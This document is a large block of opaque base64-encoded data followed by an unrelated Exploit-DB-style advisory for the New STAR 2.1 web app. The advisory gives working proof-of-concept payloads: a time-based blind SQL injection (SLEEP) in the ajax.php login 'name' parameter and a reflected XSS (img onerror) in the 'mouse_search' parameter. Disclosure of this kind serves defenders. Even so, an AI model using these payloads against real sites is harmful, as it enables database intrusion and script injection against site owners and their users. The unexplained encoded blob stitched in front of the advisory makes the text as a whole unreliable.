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
# Exploit Title: New STAR 2.1 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/new-star-listen-youtube-music/7486113
# Version: 2.1
# Category: Webapps
# Tested on: Kali Linux
# Description : 'ajax.php' working in the input field contains SQL
vulnerability. The search section also contains XSS vulnerability.
====================================================
# PoC : SQLi :
Parameter: name (GET)
Type: AND/OR time-based blind
Demo:
http://site.com/requests/ajax.php?newstar=login&name=admin&password=123456
Title: MySQL >= 5.0.12 AND time-based blind
Payload: newstar=login&name=admin' AND SLEEP(5) AND
'ddni'='ddni&password=123456
====================================================
# PoC : XSS :
Payload(1) :
http://site.com/play?mouse_search=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&p=1
